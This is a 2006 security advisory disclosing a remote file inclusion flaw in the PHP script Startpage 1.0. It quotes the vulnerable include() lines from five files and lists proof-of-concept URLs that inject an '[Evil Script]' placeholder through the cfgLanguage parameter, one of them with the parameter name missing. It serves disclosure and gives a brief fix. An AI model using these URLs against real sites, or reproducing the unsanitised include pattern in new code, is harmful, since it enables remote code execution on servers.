--------------------------------------------------------------------------------------------
Startpage 1.0 cfgLanguage Remote File Inclusion -------------------------------------------------------------------------------------------- Author : Sh3ll Date : 2006/08/10 HomePage : http://www.sh3ll.ir Contact : sh3ll[at]sh3ll[dot]ir -------------------------------------------------------------------------------------------- Affected Software Description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Startpage version : 1.0 Venedor : http://matthijs.draijer.org Class : Remote File Inclusion Risk : High Summary : Startpage v1.0 Is a Script Which Shows Your Favortie Links. -------------------------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~ The Problem Exists Is in The edit.php , functions.php , new.php PageBottom.php & PageTop.php When Used The Variable $cfgLanguage in a include() Function Without Being Declared. ----------------------------------------edit.php-------------------------------------------- ... <?php include ("language_$cfgLanguage.php"); ?> ... ----------------------------------------functions.php--------------------------------------- ... <?php include ("config.php"); include ("language_$cfgLanguage.php"); ?> ... ----------------------------------------new.php--------------------------------------------- ... <?php include ("config.php"); include ("functions.php"); include ("PageTop.php"); include ("language_$cfgLanguage.php"); connect_db(); ?> ... ----------------------------------------PageBottom.php-------------------------------------- ... <?php include ("config.php"); include ("language_$cfgLanguage.php"); ?> ... ----------------------------------------PageTop.php----------------------------------------- ... <?php include ("config.php"); include ("language_$cfgLanguage.php"); ?> ... -------------------------------------------------------------------------------------------- PoC: ~~~ http://www.target.com/[Startpage]/edit.php?=[Evil Script] http://www.target.com/[Startpage]/functions.php?cfgLanguage=[Evil Script] http://www.target.com/[Startpage]/new.php?cfgLanguage=[Evil Script] http://www.target.com/[Startpage]/PageBottom.php?cfgLanguage=[Evil Script] http://www.target.com/[Startpage]/PageTop.php?cfgLanguage=[Evil Script] Solution: ~~~~~~~~ Sanitize Variabel $cfgLanguage in edit.php , functions.php , new.php , PageBottom.php & PageTop.php -------------------------------------------------------------------------------------------- Note: ~~~~ Venedor Contacted, But No Response. So Do a Dirty Patch. -------------------------------------------------------------------------------------------- Shoutz: ~~~~~~ ~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena ~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
